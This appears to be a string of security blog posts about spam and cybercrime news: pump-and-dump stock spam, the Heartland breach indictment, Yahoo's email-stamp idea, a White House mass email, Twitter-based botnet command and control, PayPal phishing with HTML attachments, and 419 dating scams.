Spammers Get Bullish

The "Pump and Dump" stock email scam was very popular in years past (at one time comprising close to 10%-15% of all spam) but had fallen off the radar almost entirely until today. We began seeing a new pump and dump scam this morning coming in at a notable rate. If you are not familiar with this scam I will explain- Step 1. The scammer takes a position on a usually rather unknown "Penny Stock" 2. The scammer sends out a blast of emails making false claims about the stock to encourage investors to buy the stock 3. When investors buy, the stock price goes up 4. The scammer sells off all of their shares at the higher price and investors are left holding the bag. This is a scam that has been around for nearly a decade, popularized in 2000 when then 15 year old Jonathan Lebed was charged by the SEC with “using the internet to conduct a stock manipulation scheme that made profits exceeding $270,000”. Throughout the years after this incident, seeing large PnD stock pushes was a daily occurrence. Along with the scams we also saw many individuals being charged and convicted for perpetrating these scams. It now appears spammers may be attempting to capitalize on the upward trend in the US stock market over the past several months. This morning’s apparent PnD scam targets -Insight Management Corporation. While this is a considerably lower volume campaign than those seen in the past, it may still be having some effect on the stock price and trading volume.

In this case the scammers chose a stock that did in fact, just yesterday, make an announcement that it will file its quarterly results by month end. Spammers appear to be attempting to capitalize on the added attention some investors will have due to the announcement and to couple that momentum with the added price pressure applied with the spam campaign.
Here is a sample of the message:

Hacker Charged with US's Largest Data Breach to Date

It made big news back in January the day after our presidential inauguration when Heartland Payment Systems announced that their systems had been infected with malware since at least 2008, and it had been siphoning off credit card and debit card numbers and other private personal information ever since. The security breach resulted in what has become one of the Untied States' largest breach of private sector information to date. It was announced yesterday when one Albert Gonzalez aka "Segvec" along with two other Russian co-conspirators were indicted for the breach of Heartland, Hannaford Brothers, 7-Eleven stores, and several other unreleased national retailers that they had managed to steal around 130 million credit card and debit card numbers and associated info such as names and expiration dates.
It seems that Gonzalez s had a long history in this type of "work". He was once the administrator for a large underground carding site called "Shadowserver" where his actions led to his arrest back in 2003. However, instead of calling him out, he was picked up as an informant for the Secret Service where he helped to take down 28 other members of the site in what was dubbed "Operation Firewall". After this Gonzalez fled to Miami where he continued his credit card fraud ring he called "Get Rich or Die Tryin'". Once Gonzalez made his way to Miami, he changed his pseudonym to Segvec, and kept up his same old activites. Even though the authorities were aware of, and in pursuit of Segvec, at this point they were unaware that this was their old informant who once went by the name "Cumbajohnny".
Luckily he was indicted yesterday and stands to serve a maximum penalty of 5 years in prison and a possible maximum fine of $250,000 for the computer fraud count, and an additional 30 years and $1 million dollar fine on the conspiracy to commit wire fraud charges.
We are still unaware of how much of this information was abused or distributed due to the breach.
Read more at Wired[dot]com

Yahoo! Proposes 1¢ Stamp on Email

Forgive me if this turns more into a rant than objective opinion, but I find the idea of this even making past a fleeting thought, or maybe a board meeting simply silly. The fact that Yahoo!, or someone at Yahoo! came up with this idea, well they didn't actually come up with it, Bill Gates proposed the same thing back in '04 and I do believe he was laughed off of the internets. Where was I? Oh yeah, someone came up with this idea, and it actually made it as far as a press release just seems silly to me.
Yahoo! suggests email users purchase a pack of 500 virtual stamps for $5.00 US, that's a penny a piece to send email. The idea is if you impose charges to email, it will become an unprofitable deterrent to spammers, and they'll stop, or at least drastically slow down. Yeah, ok. The first major flaw in this idea is that the fee is optional. They thought ahead enough to relaize that email in its inception has always been designed to be free, and the majority of the world would not get on board with this, and thereby wouldn't simply limit all of their email traffic to people that had purchased a virtual stamp, much less pay for them in their own outgoing mail. Fail.
The second major hole that I see is that fact that the entire spam and virus world nowadays is money driven. I'm not sure if Yahoo! reads the news, but unfortunately criminals such as the one that was arrested recently charged with stealing 130 million unique credit card numbers from TJX and Heartland Payment Systems in what has become the largest PI breach in history, but I believe that the spammers and other cybercriminals won't have a hard time coming up with money to pay a 1 cent postage, even if this were to ever happen. Which it won't. Please feel free to add your free opinions while you still can. ;)

White House Spam

Just days ago, the White House was responsible for a flurry of purported unsolicited emails that were sent out pushing the Obama health care agenda. The complaints referenced a 1,500-word e-mail sent Thursday in the name of White House senior adviser David Axelrod. The subject line: “Something worth forwarding.” It seems that the White House has perhaps decided to fight fire with fire as stated in the email” Unfortunately, some of the old tactics we know so well are back - even the viral emails that fly unchecked and under the radar, spreading all sorts of lies and distortions”. While any speculation on the White House’s intentions with this letter would be just that, it does seem that they are using the same tactic that they are condemning in the email.
On Sunday night the White House issued a response. The White House said that it will change its e-mail sign-up procedures after some recipients of these e-mails complained that they had not asked to receive updates.
“We are implementing measures to make subscribing to e-mails clearer, including preventing advocacy organizations from signing people up to our lists without their permission when they deliver petition signatures and other messages on individual’s behalf,” spokesman Nick Shapiro said in a statement Sunday night.
Shapiro said in the statement: “The White House e-mail list is made up of e-mail addresses obtained solely through the White House website. The White House doesn't purchase, upload or merge from any other list. … All e-mails come from the White House website as we have no interest in emailing anyone who does not want to receive an email.
“If an individual received the e-mail because someone else or a group signed them up or forwarded the email, we hope they were not too inconvenienced. Further, we suggest that they unsubscribe from the list by clicking the link at the bottom of the e-mail or tell whoever forwarded it to them not to forward such information anymore.”
Here is the email in question:
The White House, Washington
Dear Friend,
This is probably one of the longest emails I've ever sent, but it could be the most important.
Across the country we are seeing vigorous debate about health insurance reform. Unfortunately, some of the old tactics we know so well are back - even the viral emails that fly unchecked and under the radar, spreading all sorts of lies and distortions.
As President Obama said at the town hall in New Hampshire, "where we do disagree, let's disagree over things that are real, not these wild misrepresentations that bear no resemblance to anything that's actually been proposed."
So let's start a chain email of our own. At the end of my email, you'll find a lot of information about health insurance reform, distilled into 8 ways reform provides security and stability to those with or without coverage, 8 common myths about reform and 8 reasons we need health insurance reform now.
Right now, someone you know probably has a question about reform that could be answered by what's below. So what are you waiting for? Forward this email.
Thanks,David
David AxelrodSenior Adviser to the President
P.S. We launched www.WhiteHouse.gov/realitycheck this week to knock down the rumors and lies that are floating around the internet. You can find the information below, and much more, there. For example, we've just added a video of Nancy-Ann DeParle from our Health Reform Office tackling a viral email head on. Check it out:

Command and Control via Twitter

A researcher from Arbor Networks has discovered several Twitter accounts that are being used to successfully communicate with and issue commands to a botnet linked to Brazilian identity thieves.
The botherders use tweets to issue these commands, and the bots listen via a simple RSS feed. Once a new tweet is posted, the bots react. The tweets themselves are actually base64 encoded links from which the bots are to download their new payloads. The links utilize another popular malware author medium, the shortened URL service, this time Bit.ly, which can be seen once the base64 is decoded. By using the shortener, the botherders can continue to obfuscate their path, as well as move around the actual location where their payloads are hosted without missing a beat.
This shows another spark of creativity by the dark side, utilizing a popular medium of communication to do their dirty work. I'm guessing this won't be the last time we see this given its elegance and ease. I'm not sure it will rival the popularity of the private IRC channel for bot C&C, but I'm sure there are more out there already now that the cat is out of the bag.
Screen Capture Courtesy of Arbor Networks

PayPal Phishing

PayPal phishing remains rather commonplace among all of the institutions being phished out there today. The delivery schemes do tend to change and morph throughout the year, and today's example proves that. Today, the attackers are using HTML attachments to deliver their payloads.
Of course this attack begins in your inbox as an email purporting to come from "support[dot]com" with the subject "Account Review". The body of the email gives the same old song and dance routine saying that
"We have observed activity in this account that is unusual or potentially high risk. " and they have locked your PayPal account. The from field should be hint number one that you're dealing with a scammer, aside from the fact that you received this email in the first place. You might theorize that if you were to receive an email about your PayPal account that it would actually come from PayPal.
The email goes on to instruct you on how to verify your account, and that is done by opening the attached .html document and filling out a form.The form has several fields into which you are to add some of the usual personal information such as Your name (which you'd think they'd know already), credit card number, expiration date, PIN number, and bank name. After that you are to simply click the submit button on the page. Your information is then posted to an IP address, and the bad guys have your info.
At the other end of this IP address, I'm used to find what appears to be a blank page, or a mom and pop website that has been secretly hijacked and used to store people's PI until the scammer stops back in to pick them up. This time, instead, the IP belongs to a company called Trixbox. It is actually a user interface for managing VoIP connections. Specifically an Asterisk based open source VoIP option. Finding someone to contact has not been an easy task, but we are working on trying to find someone on the other end to take this information down.

All I Wanted Was a Date

We've been seeing a lot of 419 scam emails posing as various things the past couple of weeks. We had them posing as Dilbert cartoons, TED talks, Kid Rock Fan Club emails. All of them using a template of sorts to make them initially appear as the aforementioned, but instead underneath it all they were 419s. Today we started seeing another version of these poseur scams, though not quite as flashy.
These were pretending to be email response to Yahoo! personals. Having never signed up for or received a response from Yahoo! personals, I can only speculate to the fact that these were set up to mimic what an actual reply to a personal ad would look like. These are complete with formatting such as the senders email address, which of course is a Yahoo! address, as well as Yahoo footers. One of the footers, which varied in each, is specific to Yahoo! personals. It contains tips for dating as told by the Yahoo! staff. It's a one line sort of topic, which is repeated in the email's subject line, and it includes a link to the actual Yahoo! site containing more advice on the subject.
Be careful not to fall for any of these wolves in sheep's clothing scams, even if your potential date comes with $30 million dollars.